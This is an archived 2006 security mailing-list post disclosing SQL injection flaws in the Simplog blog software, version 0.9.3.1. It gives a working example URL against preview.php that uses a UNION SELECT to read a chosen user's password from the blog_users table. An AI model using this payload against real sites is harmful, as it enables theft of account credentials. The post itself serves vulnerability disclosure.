|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
SQL Injection simplog
navairum
gmail.com
Date: Thu Oct 19 2006 - 14:27:41 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Softare: Simplog www.simplog.org
version:0.9.3.1 (i assume others as well)
There are a few sql injections available with this software. This one is in preview.php
eg.
http://site/preview.php?blogid=2&adm=tem&tid=-1%20union%20select%20password%20from%20blog_users%20where%20name='[insert username here]'
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]